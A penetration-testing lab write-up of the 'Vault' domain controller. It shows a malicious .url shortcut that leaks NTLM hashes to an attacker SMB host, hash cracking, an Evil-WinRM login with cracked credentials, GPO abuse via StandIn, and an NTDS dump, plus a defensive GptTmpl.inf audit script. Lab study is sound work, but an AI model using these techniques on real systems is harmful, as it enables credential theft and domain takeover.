
Vault

Description

To compromise this machine I had to use a client-side attack, crack an NTLM hash and escalate privileges by abusing a misconfigured GPO.

Enumeration

Nmap

TCP
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-11 13:08:24Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
636/tcp   open  tcpwrapped
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: VAULT
|   NetBIOS_Domain_Name: VAULT
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: vault.offsec
|   DNS_Computer_Name: DC.vault.offsec
|   DNS_Tree_Name: vault.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2022-06-11T13:09:13+00:00
|_ssl-date: 2022-06-11T13:09:53+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC.vault.offsec
| Not valid before: 2022-06-10T12:36:02
|_Not valid after:  2022-12-10T12:36:02
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49792/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
UDP
PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp

User Own

During basic enumeration I saw that I could list shares without authenticating.

root@kali:~/PG/Vault/xpl# smbmap -H vault.offsec -u 'a' -p ''
[+] Guest session       IP: vault.offsec:445    Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DocumentsShare                                          READ, WRITE
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        SYSVOL                                                  NO ACCESS       Logon server share
Mount ShareFolder
root@kali:~/PG/Vault/xpl# mkdir DocumentsShare
root@kali:~/PG/Vault/xpl# mount -t cifs //192.168.164.172/DocumentsShare DocumentsShare
Password for root@//192.168.164.172/DocumentsShare:

The name DocumentsShare suggests that documents are shared there, so I understood that I needed a client-side attack.
I tried uploading a docx with a malicious macro and it did not work, so the next attempt was with a malicious shortcut.

Evil ShortCut
[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\192.168.49.164\SERVER\%USERNAME%.icon
IconIndex=1
root@kali:~/PG/Vault/xpl/DocumentsShare# ls
@evil.url

Then I started a Python SMB server listening and obtained the NetNTLMv2 hash of a domain user.

root@kali:~/PG/Vault/xpl/DocumentsShare# impacket-smbserver -smb2support SERVER $(pwd)
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.164.172,49983)
[*] AUTHENTICATE_MESSAGE (VAULT\anirudh,DC)
[*] User DC\anirudh authenticated successfully
[*] anirudh::VAULT:aaaaaaaaaaaaaaaa:7190a23a8cccbc7007894e7266d447e0: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
[*] Closing down connection (192.168.164.172,49983)
[*] Remaining connections []

The next step was to crack the hash with John the Ripper.

root@kali:~/PG/Vault/xpl# john --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
SecureHM         (anirudh)
1g 0:00:00:06 DONE (2022-06-12 19:25) 0.1666g/s 1768Kp/s 1768Kc/s 1768KC/s Seifer1..Schs93
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Credentials
user: anirudh
pass: SecureHM
With these credentials I was able to access the machine with Evil-WinRM.
root@kali:~/PG/Vault/xpl# evil-winrm -i vault.offsec -u anirudh -p SecureHM

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

Root Own

The user anirudh holds SeBackupPrivilege and SeRestorePrivilege, which are exploitable, but the intended path for this machine is to abuse the GPOs applied to it. To enumerate and exploit a vulnerable policy, we do the following:

check vuln GPO with PowerView
*Evil-WinRM* PS C:\Users\anirudh\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\anirudh\Documents> Get-NetGPO


usncreated               : 5672
systemflags              : -1946157056
displayname              : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00
                           C04FB94F17}]
whenchanged              : 6/12/2022 6:18:31 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 61512
dscorepropagationdata    : {11/19/2021 9:00:32 AM, 11/19/2021 8:51:14 AM, 1/1/1601 12:00:00 AM}
name                     : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags                    : 0
cn                       : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\vault.offsec\sysvol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname        : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
whencreated              : 11/19/2021 8:50:33 AM
versionnumber            : 5
instancetype             : 4
objectguid               : 93130581-3375-49c7-88d3-afdc915a9526
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vault,DC=offsec

usncreated               : 5675
systemflags              : -1946157056
displayname              : Default Domain Controllers Policy
gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged              : 11/19/2021 8:50:33 AM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 5675
dscorepropagationdata    : {11/19/2021 8:51:14 AM, 1/1/1601 12:00:00 AM}
name                     : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags                    : 0
cn                       : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\vault.offsec\sysvol\vault.offsec\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname        : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
whencreated              : 11/19/2021 8:50:33 AM
versionnumber            : 1
instancetype             : 4
objectguid               : 0ccc30ba-3bef-43ac-9c61-ebb814e9a685
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vault,DC=offsec

*Evil-WinRM* PS C:\Users\anirudh\Documents> Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh


Trustee     : anirudh
TrusteeType : User
Permission  : GpoEditDeleteModifySecurity
Inherited   : False
Exploit with StandIn.exe
#Link
https://github.com/FuzzySecurity/StandIn

#Exploit
*Evil-WinRM* PS C:\Users\anirudh\Documents> .\standin --gpo --filter "Default Domain Policy" --localadmin anirudh

[?] Using DC : DC.vault.offsec

[+] GPO Object Found
    Object   : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
    Path     : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
    GP Path  : \\vault.offsec\sysvol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}

[+] User Object Found
    Object   : CN=Anirudh
    Path     : LDAP://CN=Anirudh,CN=Users,DC=vault,DC=offsec
    SID      : S-1-5-21-537427935-490066102-1511301751-1103

[?] GPO Version
    User     : 0
    Computer : 5

[+] Writing GPO changes
    |_ Updating existing GptTmpl.inf
       |_ Updating group membership
       |_ User SID alread part of local admins..

*Evil-WinRM* PS C:\Users\anirudh\Documents> gpupdate /force
Updating policy...



Computer Policy update has completed successfully.

User Policy update has completed successfully.



*Evil-WinRM* PS C:\Users\anirudh\Documents> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
anirudh
The command completed successfully.
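StandIn's "Updating group membership" step writes a Restricted Groups entry into the policy's GptTmpl.inf under SYSVOL, which is what pushes the user into the local Administrators group on the next gpupdate. As an added example (not part of the writeup or of the StandIn project), this script audits a GptTmpl.inf for SIDs granted membership in S-1-5-32-544 outside an expected set; the sample file body and the allowlist are constructed, and the user SID is the one shown in the StandIn output.

```python
import configparser

BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
# Constructed allowlist: only the domain Administrator (RID 500) is expected here.
EXPECTED_ADMIN_MEMBERS = {"S-1-5-21-537427935-490066102-1511301751-500"}

def parse_group_membership(inf_bytes):
    """Return {group_sid: set(members)} from the [Group Membership] section.

    GptTmpl.inf is usually UTF-16 with a BOM; Restricted Groups keys look like
    *S-1-5-32-544__Members = *S-1-5-21-...-1103 (SIDs are prefixed with '*').
    """
    if inf_bytes[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = inf_bytes.decode("utf-16")
    else:
        text = inf_bytes.decode("utf-8", errors="replace")
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # SIDs are case-sensitive identifiers; keep them as written
    cp.read_string(text)
    groups = {}
    if "Group Membership" not in cp:
        return groups
    for key, value in cp["Group Membership"].items():
        if not key.endswith("__Members"):
            continue  # __Memberof lines nest the group elsewhere; not audited here
        group = key[: -len("__Members")].lstrip("*")
        members = {m.strip().lstrip("*") for m in value.split(",") if m.strip()}
        groups[group] = members
    return groups

def unexpected_local_admins(inf_bytes, expected=EXPECTED_ADMIN_MEMBERS):
    """SIDs the GPO adds to local Administrators that are not in the expected set."""
    members = parse_group_membership(inf_bytes).get(BUILTIN_ADMINISTRATORS, set())
    return sorted(members - expected)

# Constructed GptTmpl.inf body after a user SID was appended to the members list.
SAMPLE_INF = (
    "[Unicode]\r\nUnicode=yes\r\n"
    "[Version]\r\nsignature=\"$CHICAGO$\"\r\nRevision=1\r\n"
    "[Group Membership]\r\n"
    "*S-1-5-32-544__Memberof = \r\n"
    "*S-1-5-32-544__Members = *S-1-5-21-537427935-490066102-1511301751-500,"
    "*S-1-5-21-537427935-490066102-1511301751-1103\r\n"
).encode("utf-16")

if __name__ == "__main__":
    for sid in unexpected_local_admins(SAMPLE_INF):
        print(f"unexpected local admin via GPO: {sid}")
```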

Proof

*Evil-WinRM* PS C:\Users\anirudh\Desktop> type local.txt
0e3530c198fc63ff9087fa35796809b1
*Evil-WinRM* PS C:\Users\anirudh\Desktop> type c:\users\administrator\desktop\proof.txt
baba4609b5e82b2fbe8359e5b0b325ce
*Evil-WinRM* PS C:\Users\anirudh\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.164.172
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.164.254

Extra

Dump NTDS
root@kali:~/PG/Vault/xpl# crackmapexec smb vault.offsec -u anirudh -p SecureHM --ntds
SMB         DC.vault.offsec 445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB         DC.vault.offsec 445    DC               [+] vault.offsec\anirudh:SecureHM (Pwn3d!)
SMB         DC.vault.offsec 445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         DC.vault.offsec 445    DC               [+] Dumped 17 NTDS hashes to /root/.cme/logs/DC_DC.vault.offsec_2022-06-12_203912.ntds of which 4 were added to the database